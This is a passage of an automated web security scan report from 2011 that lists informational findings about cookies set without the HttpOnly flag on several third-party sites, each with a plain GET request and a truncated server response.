Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:24 GMT
Set-Cookie: B=19galq96rvvtg&b=3&s=ms; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Imagetoolbar:
Set-Cookie: answers=lnNtoV.J6A05H.TGewyRWub06PFmg.8lobmORupvn6CkoiDzOlmF4ZCYHq53uj7SPRS3PSGPDEvU_qNBXNlZb0.PRA8hV0DBSNm.7JpT9JobS843EZCaVwZgoQzl7PIfU_KIn2imxG0oJUUJzwzRE8HQU7KDfi5OO99qNOjQlOneWp8ieXG_yXvvUwnt5PdPItrUbpJ4.wiS8Nekw706wGoUdv2dvG9XRC77kwK939YrQwzJLRvWKbRFyABMUGpBras5kjJtlM9cI7jefA4tLGXxJh_rKm8Hmf4MvAd4oJTLs7KPSs8emMcAhuQg2cZZ.GR88RHIDVsbWxCQ4jcmuBSjN8GUCxPjoGNC4km.shCRuvtKX_1KJDEwy.JyNkBuELE51V7q0obDAPMQxO5HnHu6Ix8yGOopJMmS_QlV7vXCP04fijuYMrck1axEgwguUa6zSlJm.vl4CAVkbyPa6rzwe43pmrBJSnZaYpSAxmVej3hUEJWDX8B6pUMYRms7gu_UdBQ4Mzrc411EMSlAejUdfyQHHEAJxFh_GDmqLqV6I572R.xt8Fe.WStK1A9ERU83X17RFeSyMA.T8S7X5OUX42nXFONwPPTWzagOMVKcArc4ODuAkHNUd5JDBf_KiJdqth.8ndJCJ1Nh2YQ-; expires=Thu, 03-May-2012 13:14:25 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 79733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

16.88. http://answers.yahoo.com/question/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /question/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:14:23 GMT
Set-Cookie: B=8i001rh6rvvtf&b=3&s=qp; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=MmD4EaSX6A0kmA76gW8c7h3Hi.9jI4cnSXqZz5gFTu0CNQbcLf_aPusEdOiVpQsztBEQGHjrKI4F5Ll4WUrkhPTjKQAVcPGHnlEyZb1gyapSA3QSsaF2DvZgDesI5gyb_U4BraGydvrs3782csAPzxzCLudhFqk1hcw2.zvzuV8Tgy6EAesWIlc9R18TcvuTPLgMSc_GvH9SKG3Mnksbtui.YosZOKVQ3eN81d23SPXuJ5wV1tFt_GbMNFJWgWmXqQy9SSEBgCsVptWGJ1RT6UeEIEk5_DLnSeMkzfpNQ5_.P0hvvX24WR_e3hen1eNVDR4g9uU2sWEO.bJdZYhObARQzppkU7iijImyhHeD2NSrhjaPUNEHcG.Nk72Q.hVCJ3E9FHn4GL0Mr3ifz4tIAD3NB7zQgQ_ff3VpiuoWJfENCk.9AVX0UOFjiR.D9QSrfP0Ap6vYJvKMmMpW_6TcXIS4cbqTTCODs2wT3D0U5uUpnIdXBFgWPi8-; expires=Thu, 03-May-2012 13:14:23 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31139

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

16.89. http://apps.barclays.co.uk/accessibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.barclays.co.uk
Path:   /accessibility/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessibility/ HTTP/1.1
Host: apps.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454099145:ss=1304454071727

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:00 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304418120140895; path=/; expires=Wed, 27-Apr-33 10:22:00 GMT
Cache-Control: max-age=3600, must-revalidate
Content-Length: 7537
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

16.90. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1092513615&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fgroup.barclays.com%252FWhat-we-do%252FSponsorship%252FCommunity-sponsorship%26jsref%3Dhttp%253A%252F%252Fgroup.barclays.com%252FHome%26rnd%3D1304436107086&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&jsref=http%3A%2F%2Fgroup.barclays.com%2FHome&rnd=1304436107086
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 03 May 2011 10:21:49 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 02-May-2013 10:21:49 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.91. http://banner2.set.or.th/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banner2.set.or.th
Path:   /www/delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/afr.php?n=a2713007&zoneid=8&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/head-en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22121%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 13:58:07 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22128%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D; path=/
Content-Length: 1416
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>............................................. ICT EXcellence awards 2010</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-col
...[SNIP]...

16.92. http://banner2.set.or.th/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banner2.set.or.th
Path:   /www/delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/afr.php?n=ad76ba36&zoneid=7&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=f28c040ca8a8337e11c1cbcaf661e243; expires=Wed, 02-May-2012 13:46:54 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22114%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; path=/
Content-Length: 890
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Wealth society </title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<a href
...[SNIP]...

16.93. http://banner2.set.or.th/www/delivery/ck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banner2.set.or.th
Path:   /www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php?oaparams=2__n=a2713007__trackonly=1__cb=691959200__oadest= HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/head-en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22121%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22134%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D; visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 13:59:47 GMT; path=/
Content-Length: 0
Content-Type: text/html


16.94. http://banner2.set.or.th/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banner2.set.or.th
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=121&campaignid=120&zoneid=7&loc=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&cb=ade784c3f5 HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://banner2.set.or.th/www/delivery/afr.php?n=ad76ba36&zoneid=7&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22121%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 13:48:29 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.95. https://center.ktam.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://center.ktam.co.th
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: center.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: https://center.ktam.co.th/dana-na/auth/url_default/welcome.cgi
Content-Type: text/html; charset=utf-8
Set-Cookie: DSSIGNIN=url_default; path=/dana-na/; expires=Thu, 31-Dec-2037 00:00:00 GMT; secure
Set-Cookie: DSIVS=; path=/; expires=Thu, 01 Jan 1970 22:00:00 GMT; secure
Set-Cookie: DSSignInURL=/; path=/; secure
Connection: close


16.96. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.set.or.th%2fen%2fregulations%2fcg%2froles_p1.html HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0000000138010i01401; ipinfo=2lkaebs0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; vstcnt=417s010r014smk6127p1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=012020a1lkaebsxzt1c35j; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0c35j0023f010j01501; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4010znmlkmhhb000000013f01; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: sglst=20a0sabflkmhhb000000013f010j015018nelkmhhb000000013f010j01501647lkmhhb000000013f010j01501ag3lkmhhb000000013f010j015019rylkmhhb000000013f010j01501dg4lkmhhb000000013f010j01501bnzlkmhhb000000013f010j015010tilkmhhb000000013f010j01501cgzlkmhhb000000013f010j01501a6rlkmhhb000000013f010j01501; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: vstcnt=417s010r024smk6127p10024nnav118e1022; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=h2HNCM_rmQIQi4DI6wM&guid=ON&script=0
Content-Length: 0
Date: Tue, 03 May 2011 13:58:23 GMT


16.97. http://dis.us.criteo.com/dis/dis.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?p1=v%3D2%26wi%3D7710772%26pt1%3D2%26i%3D298028&t1=sendEvent&p=1668&c=2&cb=35973562138 HTTP/1.1
Host: dis.us.criteo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Tue, 03 May 2011 13:33:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: uid=fd340c48-97d9-49e6-b9cc-cc11447dc047; domain=.criteo.com; expires=Tue, 03-May-2016 13:33:23 GMT; path=/
Set-Cookie: udc=*1PvotshjACjE74y20GwJvMA%3d%3d; domain=.criteo.com; expires=Thu, 03-Nov-2011 14:33:23 GMT; path=/
Set-Cookie: udi=*1TyLg%2bj8kO0nl1twETGzjjw%3d%3d; domain=.criteo.com; expires=Wed, 04-May-2011 13:33:23 GMT; path=/
Set-Cookie: uic=*1UcqyCJ5ErLKWGtByvFQO3g%3d%3d; domain=.criteo.com; expires=Thu, 03-Nov-2011 14:33:23 GMT; path=/
Set-Cookie: evt=*1qpkjuDrZFBe7djnQgTUIuQ%3d%3d; domain=.criteo.com; expires=Thu, 03-Nov-2011 14:33:23 GMT; path=/
Content-Length: 9

<HTML/>

16.98. http://domdex.com/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=14&k=formlessnetworking&sent=1 HTTP/1.1
Host: domdex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com
Cookie: dex=1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, no-cache
Set-Cookie: k=formlessnetworking-14-1304430131_; expires=Mon, 01-Aug-2011 13:42:11 GMT
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


16.99. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.set.or.th/p.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /red/psi/sites/www.set.or.th/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.set.or.th%2Fen%2Fregulations%2Fcg%2Froles_p1.html&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&zu5tb1 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 432
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 13:58:05 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 01 Aug 2011 13:58:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 13:58:05 GMT; Path=/
Set-Cookie: di=%7B%7D..1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 02:39:07 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 13:58:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:58:05 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degree
...[SNIP]...

16.100. https://ebank.kasikornbankgroup.com/kbiznet/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebank.kasikornbankgroup.com
Path:   /kbiznet/login.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kbiznet/login.html HTTP/1.1
Host: ebank.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:07 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 24 Feb 2011 11:45:06 GMT
ETag: "41d1-7557-bea93480"
Accept-Ranges: bytes
Content-Length: 30039
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerebankgroup_pool=436381888.47873.0000; path=/


<head>
<title>Welcome to K-BizNet</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
</style>

<link rel="stylesheet" href="/smestatic/c
...[SNIP]...

16.101. http://edge.aperture.displaymarketplace.com/displayscript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /displayscript.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 14891
Expires: Tue, 03 May 2011 13:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:56 GMT
Connection: close
Set-Cookie: mpackc=v1^1016|1234|2175; domain=displaymarketplace.com; expires=Fri, 03-May-2013 13:32:52 GMT; path=/

if (liveCon_ClientID === undefined)// && datran_ClientID === undefined)
{
   var liveCon_ClientID = 4157529279552;
}

//-----------------Helper Methods----------------------

function liveCon_Get
...[SNIP]...

16.102. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:54:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
